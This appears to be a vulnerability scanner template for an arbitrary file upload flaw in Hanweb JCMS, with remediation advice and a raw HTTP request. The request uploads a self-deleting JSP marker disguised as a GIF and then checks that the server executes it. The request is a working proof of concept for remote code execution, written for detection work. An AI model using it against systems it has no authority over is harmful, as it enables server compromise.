id: JCMS-lm_sys_opr_uploadimg_JSP-FileUpload
info:
  name: Hanweb jcms /lm/sys/opr_uploadimg.jsp file upload vulnerability
  author:
  - l0ne1y
  description: |-
    Hanweb JCMS opr_uploadimg.jsp arbitrary file upload vulnerability.
    Hanweb JCMS is a content management system designed on a J2EE architecture. The system provides all the functions needed throughout the information lifecycle, including content collection, creation, management, delivery, publishing, and shared distribution.

    Hanweb JCMS has an arbitrary file upload vulnerability. A remote attacker can exploit it to upload files and execute code.
  severity: critical
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    https://www.hanweb.com/

    Temporary Fix:
    1. Set the server-side file upload directory to be non-executable.
    2. File type check: it is recommended to use a whitelist approach (more reliable than a blacklist), combined with MIME type and extension checks. Additionally, for images, use compression or resize functions, which break any embedded HTML code while processing the image.
    3. Rename files and paths using random numbers so users cannot easily access the files they upload.
    4. Set up a separate domain for the file server.
    5. Validate file content using regular expressions to match malicious code (filtering various bypass techniques such as case variations and BASE64 encoding) to restrict uploads.
    6. Fix any parsing vulnerabilities that may exist on the server.
    7. Strictly restrict uploads of files that can modify server configuration, such as .htaccess.
    8. Hide uploaded file paths.
    9. Timely fix web upload code.
    10. There must be no local file inclusion vulnerability.
requests:
- raw:
  - |
    POST /lm/sys/opr_uploadimg.jsp?action=upload&img=testvul.jsp HTTP/1.1
    Host: {{Hostname}}
    Accept-Encoding: gzip, deflate
    Content-Length: 376
    Content-Type: multipart/form-data; boundary=4e400c16cce04a9d803521e49ff67443
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36

    --4e400c16cce04a9d803521e49ff67443
    Content-Disposition: form-data; name="NewFile"; filename="57h9.gif"
    Content-Type: image/gif

    <%
    out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
    new java.io.File(application.getRealPath(request.getServletPath())).delete();
    %>
    --4e400c16cce04a9d803521e49ff67443--
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"e165421110ba03099a1c0393373c5b43")
  matchers-condition: and
  path:
  - '{{BaseURL}}/images/testvul.jsp'
  method: GET
